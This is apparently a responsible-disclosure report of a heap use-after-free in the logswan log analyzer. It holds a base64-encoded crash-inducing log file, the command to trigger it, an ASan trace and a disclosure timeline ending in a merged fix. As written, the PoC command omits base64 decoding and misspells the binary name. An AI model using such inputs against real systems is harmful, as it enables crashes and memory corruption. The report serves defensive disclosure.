Use After Free in fcambus/logswan

Valid

Reported on

Nov 29th 2021


Description

Good morning, I hope you're doing well today. Whilst testing logswan built with Clang12 + ASan on Ubuntu 20.04.3 LTS from commit bcfd41, we discovered a heap-use-after-free situation during a strcmp operation on line 259 of logswan/src/logswan.c.

Proof of Concept

First...

echo "MC4wLjAuMCAwIDBbMF0wIiAKMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAKMC4wLjAuMCAwIDBbMF0wIjA=" | base64 > /tmp/test.log

Then...

./logwan /tmp/test.log

Stack Trace:

==8152==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000000051 at pc 0x00000026f5d2 bp 0x7ffcf50d1170 sp 0x7ffcf50d0918
READ of size 1 at 0x60c000000051 thread T0
    #0 0x26f5d1 in strcmp (/root/logswan/build/logswan+0x26f5d1)
    #1 0x30d473 in main /root/logswan/src/logswan.c:259:11
    #2 0x7fa42491f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #3 0x25c7ad in _start (/root/logswan/build/logswan+0x25c7ad)

0x60c000000051 is located 17 bytes inside of 120-byte region [0x60c000000040,0x60c0000000b8)
freed by thread T0 here:
    #0 0x2d7d29 in realloc (/root/logswan/build/logswan+0x2d7d29)
    #1 0x7fa42497e71d in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:102:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/libpthread.so.0+0x3a5f)

previously allocated by thread T0 here:
    #0 0x2d7a0d in malloc (/root/logswan/build/logswan+0x2d7a0d)
    #1 0x7fa42497e6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/libpthread.so.0+0x3a5f)

SUMMARY: AddressSanitizer: heap-use-after-free (/root/logswan/build/logswan+0x26f5d1) in strcmp

Impact

This vulnerability is capable of crashing the software, heap corruption, and other unspecified issues resulting from using memory after it has been freed by the software.

We are processing your report and will contact the fcambus/logswan team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the fcambus/logswan team and are waiting to hear back 2 months ago
Jamie Slome validated this vulnerability a month ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on c3fc63 a month ago
The fix bounty has been dropped